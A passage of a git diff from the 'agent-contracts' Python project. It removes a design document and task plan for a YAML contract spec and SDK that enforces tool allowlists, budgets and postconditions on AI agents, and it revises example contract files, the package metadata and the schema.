budgets/effects at runtime, and emits OTel-compatible violation events -3. **Ship a CLI** for validation, compatibility checking, contract generation from traces, and eval testing -4. **Ship framework adapters** for LangChain, CrewAI, and Pydantic AI (each <200 LOC, 3-line integration) -5. **Draft MCP extension proposal** (`x-agent-contract`) for tool-level contract metadata - -## Non-Goals - -1. **Not a protocol** — MCP owns transport; we layer policy above it -2. **Not a platform** — no hosted service, no vendor lock-in -3. **Not formal verification** — no theorem proving; executable assertions at Levels 2–3 -4. **No custom DSL** — YAML primary, CEL-like expressions for inline checks only -5. **No TypeScript SDK** in v0.1 (deferred to v0.1.x, 4–6 weeks post-launch) -6. **No contract registry** — premature infrastructure at zero adoption -7. **No inter-agent negotiation** — requires ecosystem maturity -8. **No taint tracking** — novel; deferred to v0.2 - ---- - -## Design - -### Option A: Monolithic SDK (Single Package, Everything Built-in) - -**Approach:** Single `agent-contracts` package containing spec schema, loader, validator, -enforcer, CLI, OTel emitter, composition checker, and all framework adapters. - -**Trade-offs:** -- Pro: Single install, single import, simpler dependency management -- Con: Pulls in framework deps (langchain, crewai, pydanticai) even if unused; bloated install - -**Complexity:** ~3000 LOC, 1 package, heavy deps - -### Option B: Modular Core + Optional Extras (Recommended) - -**Approach:** Core package (`agent-contracts`) with zero required framework deps. -Framework adapters as optional extras (`pip install agent-contracts[langchain]`). -CLI bundled in core. OTel as optional extra. - -**Trade-offs:** -- Pro: Minimal install footprint; framework deps only when needed; clean separation of concerns -- Pro: Each module testable independently; easier to maintain -- Con: Slightly more complex packaging (extras_require) - -**Complexity:** ~3500 LOC, 1 package with extras, minimal required deps (pyyaml, jsonschema) - -### Recommendation - -**Option B** — Modular Core + Optional Extras. Matches the plan's "standalone value first" strategy. -A developer gets `pip install agent-contracts` with zero framework baggage. Framework adapters -are opt-in. This mirrors how OpenTelemetry structures its packages. - ---- - -## Detailed Design - -### Package Structure - -``` -agent-contracts/ -├── pyproject.toml # Package config (hatch build system) -├── LICENSE # Apache-2.0 -├── README.md # Getting started, 5-minute contract -├── AGENT_CONTRACT.yaml # Reference example (support triage agent) -├── src/ -│ └── agent_contracts/ -│ ├── __init__.py # Public API surface -│ ├── py.typed # PEP 561 marker -│ ├── types.py # Core data models (dataclasses) -│ ├── schema.py # JSON Schema definitions (all 3 tiers) -│ ├── loader.py # YAML loading + schema validation -│ ├── tier.py # Tier assessment logic -│ ├── enforcer.py # Runtime enforcement (budgets, effects, schemas) -│ ├── effects.py # Effect authorization (default-deny allowlist) -│ ├── budgets.py # Budget tracking (cost, tokens, tool calls, duration) -│ ├── postconditions.py # Postcondition evaluation (sync/async/monitor) -│ ├── violations.py # Violation event creation + OTel emission -│ ├── composition.py # Contract Differential (schema/capability/budget gaps) -│ ├── cli.py # CLI entry point (click-based) -│ ├── init_from_trace.py # Generate contract skeleton from traces -│ ├── _version.py # Version constant -│ └── adapters/ -│ ├── __init__.py -│ ├── langchain.py # LangChain adapter (<200 LOC) -│ ├── crewai.py # CrewAI adapter (<200 LOC) -│ └── pydantic_ai.py # Pydantic AI adapter (<200 LOC) -├── schemas/ -│ └── agent-contract.schema.json # The JSON Schema (machine-readable spec) -├── spec/ -│ └── SPECIFICATION.md # Human-readable spec narrative -├── mcp/ -│ └── x-agent-contract.md # MCP extension proposal -├── examples/ -│ ├── support_triage.yaml # Tier 2 reference example -│ ├── simple_chatbot.yaml # Tier 0 minimal example -│ └── cost_controlled.yaml # Tier 1 budget-focused example -└── tests/ - ├── __init__.py - ├── conftest.py # Shared fixtures - ├── test_loader.py # Contract loading + validation - ├── test_tier.py # Tier assessment - ├── test_enforcer.py # Runtime enforcement - ├── test_effects.py # Effect authorization - ├── test_budgets.py # Budget tracking - ├── test_postconditions.py # Postcondition evaluation - ├── test_violations.py # Violation events - ├── test_composition.py # Contract Differential - ├── test_cli.py # CLI commands - ├── test_init_from_trace.py # Trace-based generation - └── test_adapters/ - ├── test_langchain.py - ├── test_crewai.py - └── test_pydantic_ai.py -``` - -### Core Data Models (`types.py`) - -```python -@dataclass(frozen=True) -class ContractIdentity: - name: str - version: str - -@dataclass(frozen=True) -class PostconditionDef: - name: str - check: str # CEL-like expression or "eval:judge" reference - enforcement: Literal["sync_block", "sync_warn", "async_monitor"] - severity: Literal["critical", "major", "minor"] - slo: SLODef | None = None - -@dataclass(frozen=True) -class EffectsAuthorized: - tools: list[str] # Allowlist (default: deny all) - network: list[str] # URL patterns - state_writes: list[str] # State scope patterns - -@dataclass(frozen=True) -class EffectsDeclared: - tools: list[str] # Actual effect footprint - network: list[str] - state_writes: list[str] - -@dataclass(frozen=True) -class ResourceBudgets: - max_cost_usd: float | None - max_tokens: int | None - max_tool_calls: int | None - max_duration_seconds: float | None - -@dataclass(frozen=True) -class Contract: - spec_version: str - identity: ContractIdentity - postconditions: list[PostconditionDef] - tier: int # Computed: 0, 1, or 2 - # Tier 1 - input_schema: dict | None - output_schema: dict | None - effects_authorized: EffectsAuthorized | None - budgets: ResourceBudgets | None - # Tier 2 - failure_model: dict | None - effects_declared: EffectsDeclared | None - delegation: DelegationRules | None - observability: ObservabilityConfig | None - versioning: VersioningConfig | None - slo: SLOConfig | None -``` - -### Enforcement Flow (`enforcer.py`) - -``` -Agent invocation - │ - ├─ PRE: validate input against input_schema (Tier 1) - │ - ├─ DURING: intercept each tool call - │ ├─ Check tool name against effects.authorized.tools (default: DENY) - │ ├─ Increment tool_call counter → check against max_tool_calls - │ ├─ Accumulate cost → check against max_cost_usd - │ ├─ Check elapsed time → check against max_duration_seconds - │ └─ On violation → emit OTel event, circuit-break or warn - │ - ├─ POST: validate output against output_schema (Tier 1) - │ ├─ Evaluate sync_block postconditions → block if failed - │ ├─ Evaluate sync_warn postconditions → warn if failed - │ └─ Queue async_monitor postconditions → evaluate async - │ - └─ EMIT: violation events (OTel-compatible) -``` - -Three usage patterns: -1. **Decorator:** `@enforce_contract("path/to/contract.yaml")` -2. **Context Manager:** `with ContractEnforcer(contract) as enforcer:` -3. **Explicit API:** `enforcer.check_tool_call(name, args)`, `enforcer.validate_output(data)` - -### Effect Authorization (`effects.py`) - -- **Default-deny:** If `effects.authorized.tools` is defined, only listed tools are allowed -- **Pattern matching:** Supports glob patterns (`database.*`, `api.user.*`) -- **Composition:** During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- **Audit:** Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` - -### Budget Enforcement (`budgets.py`) - -- Per-invocation counters: cost, tokens, tool_calls, elapsed time -- Thread-safe (uses threading.Lock for counter updates) -- Circuit breaker: when threshold hit, raises `BudgetExceededError` -- Cost tracking: accepts cost callbacks from the caller (we don't hardcode model prices) - -### Violation Events (`violations.py`) - -OTel-compatible structured events: -```python -@dataclass -class ViolationEvent: - contract_id: str - contract_version: str - violated_clause: str # e.g., "budgets.max_cost_usd" - evidence: dict # e.g., {"actual": 5.23, "limit": 5.00} - severity: str # "critical", "major", "minor" - enforcement: str # "blocked", "warned", "monitored" - trace_id: str | None - span_id: str | None - timestamp: str # ISO 8601 -``` - -Emitters: stdout (default), OTel SDK (when `opentelemetry-api` installed), callback. - -### Composition Checker (`composition.py`) - -Contract Differential between two Tier 2 contracts: -- **Schema gaps:** Input schema A not assignable to output schema B -- **Capability gaps:** A requires tools not authorized by B -- **Budget gaps:** A's budget exceeds B's budget -- **Effect validation:** A's declared effects not ⊆ B's authorized effects -- Returns structured report with compatibility verdict - -### CLI (`cli.py`) - -Built on `click`. Four commands: -- `validate`: Load contract, validate schema, report tier, recommend missing fields -- `check-compat`: Run composition checker between two contracts -- `init`: Generate contract skeleton from execution trace JSONL -- `test`: Run eval suite against contract postconditions - ---- - -## Security & Privacy Considerations - -- [x] **Default-deny effects** — tools not in allowlist are blocked before execution -- [x] **No prompt-level enforcement** — all enforcement at SDK layer (not bypassable via injection) -- [x] **Budget circuit breakers** — prevent cost runaway architecturally -- [x] **No secrets in contracts** — contracts are declarative policy, no credentials -- [x] **Input validation** — all YAML input validated against JSON Schema before processing -- [x] **No eval()** — CEL-like expressions parsed by a safe evaluator, never `eval()` -- [x] **Thread-safe counters** — budget enforcement is concurrency-safe -- [x] **Immutable data models** — `frozen=True` dataclasses prevent mutation after construction - ---- - -## Testing Strategy - -### Unit Tests -- Loader: valid/invalid YAML, schema validation errors, partial contracts -- Tier: correct tier classification for all combinations of fields -- Enforcer: tool call interception, budget tracking, input/output validation -- Effects: allowlist matching, glob patterns, default-deny, composition (intersection/union) -- Budgets: counter increments, threshold detection, thread safety -- Postconditions: sync_block/sync_warn/async_monitor evaluation -- Violations: event creation, OTel formatting, callback emission -- Composition: schema compatibility, capability gaps, budget gaps - -### Integration Tests -- Full enforcement flow: load contract → enforce agent invocation → collect violations -- CLI commands: validate, check-compat, init from sample traces -- Framework adapters: integration with mocked LangChain/CrewAI/Pydantic AI hooks - -### Test Coverage Target -- 90%+ line coverage on core modules (loader, enforcer, effects, budgets) -- 80%+ on adapters and CLI - ---- - -## Monitoring & Observability - -- **Built-in:** Violation events are the core observability primitive -- **OTel integration:** Events conform to OpenTelemetry semantic conventions -- **Metrics:** contract_satisfaction_rate, budget_utilization, effect_violations_total -- N/A for self-monitoring — this is the monitoring SDK, not a monitored service - ---- - -## Rollback Plan - -- [x] Change is revertable with `git revert` (all commits on feature branch) -- [x] No data migrations -- [x] Not applicable (new repo, no production deployment) -- [x] Rollback: `pip uninstall agent-contracts` - ---- - -## Dependencies & Risks - -### Required Dependencies (minimal) -- `pyyaml>=6.0` — YAML parsing -- `jsonschema>=4.20` — JSON Schema validation -- `click>=8.0` — CLI framework - -### Optional Dependencies -- `opentelemetry-api>=1.20` — OTel event emission -- `langchain-core>=0.2` — LangChain adapter -- `crewai>=0.50` — CrewAI adapter -- `pydantic-ai>=0.1` — Pydantic AI adapter - -### Risks -- **Adoption stalls at Tier 0** (medium) — mitigated by CLI nudges toward Tier 1 -- **CEL expression parser complexity** — mitigated by starting with simple comparisons only -- **Framework adapter API changes** — mitigated by pinning minimum versions, thin wrappers - ---- - -## Approval - -- [ ] Design reviewed by quality reviewer -- [ ] Design reviewed by cross-reviewer (DADS, Complex tier) -- [ ] Security considerations reviewed -- [ ] Testing strategy adequate for risk level diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md b/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md deleted file mode 100644 index 8617d75..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md +++ /dev/null @@ -1,165 +0,0 @@ -# Agent Contracts v0.1 — Implementation Plan - -## Goal -Build the Agent Contracts v0.1 project: YAML spec + Python SDK + CLI + framework adapters + MCP extension proposal. - -## Approach -Sequential implementation starting with the spec/schema foundation, then core SDK modules (bottom-up by dependency), CLI, adapters, and finally documentation/examples. Each task is independently committable and revertable. - -## File Inventory - -| File | Action | Task | -|------|--------|------| -| `pyproject.toml` | CREATE | T1 | -| `LICENSE` | CREATE | T1 | -| `src/agent_contracts/__init__.py` | CREATE | T1 | -| `src/agent_contracts/py.typed` | CREATE | T1 | -| `src/agent_contracts/_version.py` | CREATE | T1 | -| `schemas/agent-contract.schema.json` | CREATE | T2 | -| `src/agent_contracts/types.py` | CREATE | T3 | -| `src/agent_contracts/schema.py` | CREATE | T3 | -| `src/agent_contracts/loader.py` | CREATE | T4 | -| `src/agent_contracts/tier.py` | CREATE | T4 | -| `src/agent_contracts/effects.py` | CREATE | T5 | -| `src/agent_contracts/budgets.py` | CREATE | T5 | -| `src/agent_contracts/postconditions.py` | CREATE | T6 | -| `src/agent_contracts/violations.py` | CREATE | T6 | -| `src/agent_contracts/enforcer.py` | CREATE | T7 | -| `src/agent_contracts/composition.py` | CREATE | T8 | -| `src/agent_contracts/init_from_trace.py` | CREATE | T9 | -| `src/agent_contracts/cli.py` | CREATE | T9 | -| `src/agent_contracts/adapters/__init__.py` | CREATE | T10 | -| `src/agent_contracts/adapters/langchain.py` | CREATE | T10 | -| `src/agent_contracts/adapters/crewai.py` | CREATE | T10 | -| `src/agent_contracts/adapters/pydantic_ai.py` | CREATE | T10 | -| `examples/support_triage.yaml` | CREATE | T11 | -| `examples/simple_chatbot.yaml` | CREATE | T11 | -| `examples/cost_controlled.yaml` | CREATE | T11 | -| `AGENT_CONTRACT.yaml` | CREATE | T11 | -| `spec/SPECIFICATION.md` | CREATE | T12 | -| `mcp/x-agent-contract.md` | CREATE | T12 | -| `tests/conftest.py` | CREATE | T4 | -| `tests/test_loader.py` | CREATE | T4 | -| `tests/test_tier.py` | CREATE | T4 | -| `tests/test_effects.py` | CREATE | T5 | -| `tests/test_budgets.py` | CREATE | T5 | -| `tests/test_postconditions.py` | CREATE | T6 | -| `tests/test_violations.py` | CREATE | T6 | -| `tests/test_enforcer.py` | CREATE | T7 | -| `tests/test_composition.py` | CREATE | T8 | -| `tests/test_cli.py` | CREATE | T9 | -| `tests/test_init_from_trace.py` | CREATE | T9 | -| `tests/test_adapters/test_langchain.py` | CREATE | T10 | -| `tests/test_adapters/test_crewai.py` | CREATE | T10 | -| `tests/test_adapters/test_pydantic_ai.py` | CREATE | T10 | -| `README.md` | MODIFY | T13 | -| `.gitignore` | CREATE | T1 | -| `CLAUDE.md` | CREATE | T13 | - ---- - -## Tasks - -### T1: Project scaffolding and package configuration -- **What:** Create pyproject.toml (hatch build), LICENSE (Apache-2.0), .gitignore, package __init__.py, py.typed marker, _version.py -- **Files:** pyproject.toml, LICENSE, .gitignore, src/agent_contracts/__init__.py, src/agent_contracts/py.typed, src/agent_contracts/_version.py -- **LOC estimate:** ~120 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pip install -e ".[dev]" && python -c "import agent_contracts; print(agent_contracts.__version__)"` -- **Commit:** `build(project): scaffold package with pyproject.toml and Apache-2.0 license` -- **Rollback:** `git revert ` - -### T2: JSON Schema for AGENT_CONTRACT.yaml (all 3 tiers) -- **What:** Create the formal JSON Schema that defines the AGENT_CONTRACT.yaml format. Covers Tier 0 (identity + postconditions), Tier 1 (+ schemas, effects.authorized, budgets), Tier 2 (+ failure_model, effects.declared, delegation, observability, versioning, slo). Supports x- extensions and must-ignore unknown fields. -- **Files:** schemas/agent-contract.schema.json -- **LOC estimate:** ~280 -- **Verify:** `python -c "import json; s=json.load(open('schemas/agent-contract.schema.json')); print(s['title'])"` -- **Commit:** `feat(spec): add JSON Schema for AGENT_CONTRACT.yaml covering all 3 tiers` -- **Rollback:** `git revert ` - -### T3: Core data models and schema module -- **What:** Define frozen dataclasses for Contract, ContractIdentity, PostconditionDef, EffectsAuthorized, EffectsDeclared, ResourceBudgets, DelegationRules, ObservabilityConfig, VersioningConfig, SLOConfig, SLODef. Schema module loads and exposes the JSON Schema. -- **Files:** src/agent_contracts/types.py, src/agent_contracts/schema.py -- **LOC estimate:** ~250 -- **Verify:** `python -c "from agent_contracts.types import Contract, ResourceBudgets; print('OK')"` -- **Commit:** `feat(core): add typed data models and schema module` -- **Rollback:** `git revert ` - -### T4: Contract loader, tier assessor, and tests -- **What:** YAML loading with schema validation, tier assessment (classify as 0/1/2 based on fields present), recommendation engine for missing fields. Shared test fixtures. Tests for loader and tier. -- **Files:** src/agent_contracts/loader.py, src/agent_contracts/tier.py, tests/conftest.py, tests/test_loader.py, tests/test_tier.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pytest tests/test_loader.py tests/test_tier.py -v` -- **Commit:** `feat(core): add contract loader with schema validation and tier assessment` -- **Rollback:** `git revert ` - -### T5: Effect authorization and budget enforcement with tests -- **What:** Default-deny effect gating with glob pattern matching. Budget tracker with thread-safe counters, circuit breaker on threshold. Tests for both. -- **Files:** src/agent_contracts/effects.py, src/agent_contracts/budgets.py, tests/test_effects.py, tests/test_budgets.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_effects.py tests/test_budgets.py -v` -- **Commit:** `feat(core): add effect authorization (default-deny) and budget enforcement` -- **Rollback:** `git revert ` - -### T6: Postcondition evaluation and violation events with tests -- **What:** Postcondition evaluator supporting sync_block/sync_warn/async_monitor enforcement timing. Safe expression evaluator for CEL-like checks (no eval()). Violation event model (OTel-compatible). Event emitters: stdout, callback, optional OTel SDK. Tests. -- **Files:** src/agent_contracts/postconditions.py, src/agent_contracts/violations.py, tests/test_postconditions.py, tests/test_violations.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_postconditions.py tests/test_violations.py -v` -- **Commit:** `feat(core): add postcondition evaluation and OTel-compatible violation events` -- **Rollback:** `git revert ` - -### T7: Runtime enforcer (middleware) with tests -- **What:** ContractEnforcer class that wires together effects, budgets, postconditions, and violations into a unified enforcement flow. Supports decorator, context manager, and explicit API. Pre-call input validation, per-tool-call interception, post-call output validation. -- **Files:** src/agent_contracts/enforcer.py, tests/test_enforcer.py -- **LOC estimate:** ~250 -- **Verify:** `python -m pytest tests/test_enforcer.py -v` -- **Commit:** `feat(core): add runtime enforcer with decorator, context manager, and explicit API` -- **Rollback:** `git revert ` - -### T8: Composition checker (Contract Differential) with tests -- **What:** Given two Tier 2 contracts, compute schema gaps, capability gaps, budget gaps, effect validation (declared ⊆ authorized). Returns structured compatibility report. -- **Files:** src/agent_contracts/composition.py, tests/test_composition.py -- **LOC estimate:** ~200 -- **Verify:** `python -m pytest tests/test_composition.py -v` -- **Commit:** `feat(core): add composition checker with Contract Differential analysis` -- **Rollback:** `git revert ` - -### T9: CLI tool and trace-based init with tests -- **What:** Click-based CLI with 4 commands: validate, check-compat, init (from-trace), test. Trace parser reads JSONL execution traces and generates contract skeleton. Tests. -- **Files:** src/agent_contracts/cli.py, src/agent_contracts/init_from_trace.py, tests/test_cli.py, tests/test_init_from_trace.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m agent_contracts.cli validate examples/support_triage.yaml` (after T11) -- **Commit:** `feat(cli): add validate, check-compat, init, and test commands` -- **Rollback:** `git revert ` - -### T10: Framework adapters (LangChain, CrewAI, Pydantic AI) with tests -- **What:** Thin adapter wrappers (<200 LOC each) that map framework-specific hooks to the SDK's enforcement API. Each adapter enables 3-line contract enforcement integration. Tests with mocked framework interfaces. -- **Files:** src/agent_contracts/adapters/__init__.py, src/agent_contracts/adapters/langchain.py, src/agent_contracts/adapters/crewai.py, src/agent_contracts/adapters/pydantic_ai.py, tests/test_adapters/test_langchain.py, tests/test_adapters/test_crewai.py, tests/test_adapters/test_pydantic_ai.py -- **LOC estimate:** ~300 (adapters) + ~200 (tests) -- **Verify:** `python -m pytest tests/test_adapters/ -v` -- **Commit:** `feat(adapters): add LangChain, CrewAI, and Pydantic AI framework adapters` -- **Rollback:** `git revert ` - -### T11: Reference examples and root contract -- **What:** Create example AGENT_CONTRACT.yaml files: support_triage (Tier 2, full), simple_chatbot (Tier 0, minimal), cost_controlled (Tier 1, budget-focused). Root AGENT_CONTRACT.yaml as the canonical reference. All must pass schema validation. -- **Files:** AGENT_CONTRACT.yaml, examples/support_triage.yaml, examples/simple_chatbot.yaml, examples/cost_controlled.yaml -- **LOC estimate:** ~200 -- **Verify:** `python -m agent_contracts.cli validate AGENT_CONTRACT.yaml && python -m agent_contracts.cli validate examples/support_triage.yaml` -- **Commit:** `docs(examples): add reference AGENT_CONTRACT.yaml files for all 3 tiers` -- **Rollback:** `git revert ` - -### T12: Specification narrative and MCP extension proposal -- **What:** Human-readable spec document explaining each field, the tier system, breaking change rules, and CEL expression syntax. MCP extension proposal for x-agent-contract on tool definitions. -- **Files:** spec/SPECIFICATION.md, mcp/x-agent-contract.md -- **LOC estimate:** ~250 -- **Verify:** Manual review — documents should be complete and accurate -- **Commit:** `docs(spec): add human-readable specification and MCP extension proposal` -- **Rollback:** `git revert ` - -### T13: README, CLAUDE.md, and public API surface -- **What:** Getting-started README with 5-minute contract experience, quick examples, API reference. CLAUDE.md for repo conventions. Polish __init__.py public exports. -- **Files:** README.md, CLAUDE.md, src/agent_contracts/__init__.py -- **LOC estimate:** ~200 -- **Verify:** `python -c "from agent_contracts import Contract, ContractEnforcer, load_contract, validate_contract; print('Public API OK')"` -- **Commit:** `docs(readme): add getting-started guide and CLAUDE.md conventions` -- **Rollback:** `git revert ` diff --git a/examples/cost_controlled.yaml b/examples/cost_controlled.yaml index 65b1868..7fc438a 100644 --- a/examples/cost_controlled.yaml +++ b/examples/cost_controlled.yaml @@ -1,13 +1,12 @@ # Tier 1 — Enforceable Contract -# Adds cost control, tool-use security, and input/output validation. -# The SDK can enforce these at the boundary. +# Adds cost control plus coding/build shell and file scopes. agent_contract: "0.1.0" identity: name: cost-controlled-researcher - version: "1.2.0" - description: A research agent with strict cost and tool-use controls. + version: "0.1.0" + description: Research helper with strict spend and execution controls. contract: postconditions: @@ -20,21 +19,15 @@ contract: check: "len(output.sources) > 0" enforcement: sync_warn severity: major - description: Research output should include at least one source. inputs: schema: type: object - required: - - query + required: [query] properties: query: type: string minLength: 1 - max_results: - type: integer - minimum: 1 - maximum: 50 outputs: schema: @@ -46,25 +39,22 @@ outputs: type: array items: type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: - tools: - - web_search - - document_reader - - summarizer - network: - - "https://api.search-provider.com/*" - - "https://docs.example.com/*" + tools: [web_search, document_reader, summarizer] + network: ["https://api.search-provider.com/*", "https://docs.example.com/*"] state_writes: [] + filesystem: + read: ["docs/**", "README.md"] + write: ["notes/**"] + shell: + commands: ["python -m pytest *"] resources: budgets: max_cost_usd: 0.50 max_tokens: 15000 max_tool_calls: 10 + max_shell_commands: 2 max_duration_seconds: 60.0 diff --git a/examples/demo_blocked_command.yaml b/examples/demo_blocked_command.yaml new file mode 100644 index 0000000..9a3025a --- /dev/null +++ b/examples/demo_blocked_command.yaml @@ -0,0 +1,29 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-command-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_shell_commands: 3 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_blocked_file_write.yaml b/examples/demo_blocked_file_write.yaml new file mode 100644 index 0000000..285f5c2 --- /dev/null +++ b/examples/demo_blocked_file_write.yaml @@ -0,0 +1,24 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-file-write-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**"] + write: ["src/**"] + tools: [] + network: [] + state_writes: [] + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_failed_checks.yaml b/examples/demo_failed_checks.yaml new file mode 100644 index 0000000..350fee9 --- /dev/null +++ b/examples/demo_failed_checks.yaml @@ -0,0 +1,15 @@ +agent_contract: "0.1.0" + +identity: + name: failed-checks-demo + version: "0.1.0" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/repo_build_agent.yaml b/examples/repo_build_agent.yaml new file mode 100644 index 0000000..9f33554 --- /dev/null +++ b/examples/repo_build_agent.yaml @@ -0,0 +1,41 @@ +agent_contract: "0.1.0" + +identity: + name: repo-build-agent + version: "0.1.0" + description: Repo-local coding/build agent with bounded file and shell scope. + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/simple_chatbot.yaml b/examples/simple_chatbot.yaml index ee46077..ed114d2 100644 --- a/examples/simple_chatbot.yaml +++ b/examples/simple_chatbot.yaml @@ -1,13 +1,11 @@ # Tier 0 — Minimal Valid Contract -# A developer gets value from writing this even if nothing else reads it. -# 4 fields. Adopt in 5 minutes. No runtime required. agent_contract: "0.1.0" identity: name: simple-chatbot - version: "1.0.0" - description: A basic conversational chatbot with a single quality guarantee. + version: "0.1.0" + description: Basic chatbot with one non-null response guarantee. contract: postconditions: @@ -15,4 +13,3 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: The chatbot must always produce a non-null response. diff --git a/examples/support_triage.yaml b/examples/support_triage.yaml index 7ba7fdd..56597a7 100644 --- a/examples/support_triage.yaml +++ b/examples/support_triage.yaml @@ -1,16 +1,11 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Tier 2 — Composable Contract (retained broader example) agent_contract: "0.1.0" identity: name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. + version: "0.1.0" + description: Triages incoming support tickets with explicit safety and audit hooks. authors: - Piyush Vyas @@ -20,39 +15,24 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. - name: valid_priority check: 'output.priority in ["critical", "high", "medium", "low"]' enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - name: has_routing check: 'output.routed_to is not None' enforcement: sync_warn severity: major - description: Should route to a team (warn if not). slo: target_rate: 0.99 window: "24h" - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - inputs: schema: type: object - required: - - ticket_id - - subject - - body + required: [ticket_id, subject, body] properties: ticket_id: type: string @@ -60,31 +40,22 @@ inputs: type: string body: type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string preconditions: - name: ticket_not_empty check: "len(input.body) > 0" - description: Ticket body must not be empty. outputs: schema: type: object - required: - - priority - - category + required: [priority, category] properties: + ticket_id: + type: string + subject: + type: string + body: + type: string priority: type: string enum: ["critical", "high", "medium", "low"] @@ -92,14 +63,6 @@ outputs: type: string routed_to: type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: @@ -109,7 +72,6 @@ effects: - ticket_database.assign - customer_lookup - knowledge_base.search - - notification.send_team network: - "https://api.ticketing.internal/*" - "https://api.customers.internal/*" @@ -143,77 +105,15 @@ failure_model: errors: - name: ticket_not_found retryable: false - description: The referenced ticket does not exist. - - name: database_timeout retryable: true max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent observability: traces: enabled: true sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. - violation_events: emit: true destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/pyproject.toml b/pyproject.toml index d54a0ed..38534a5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,7 +5,7 @@ build-backend = "hatchling.build" [project] name = "aicontracts" dynamic = ["version"] -description = "YAML spec + validation SDK for production agent reliability — cost control, tool-use security, and audit trails." +description = "Repo-local, fail-closed guardrails for autonomous coding/build agents." readme = "README.md" license = "Apache-2.0" requires-python = ">=3.9" @@ -25,9 +25,8 @@ classifiers = [ "Typing :: Typed", ] keywords = [ - "agent", "contracts", "llm", "safety", "validation", "mcp", - "ai-agents", "guardrails", "governance", "compliance", "observability", - "opentelemetry", "budget", "cost-control", "tool-use", "audit", + "agent", "contracts", "coding-agent", "build-agent", "guardrails", "repo-local", + "fail-closed", "budgets", "tool-use", "filesystem", "shell", "ci", ] dependencies = [ "pyyaml>=6.0", @@ -96,3 +95,15 @@ python_version = "3.9" strict = true warn_return_any = true warn_unused_configs = true + +[[tool.mypy.overrides]] +module = [ + "yaml", + "jsonschema", + "jsonschema.*", + "opentelemetry", + "opentelemetry.*", + "openai_agents", + "langchain_core.*", +] +ignore_missing_imports = true diff --git a/schemas/agent-contract.schema.json b/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/schemas/agent-contract.schema.json +++ b/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable 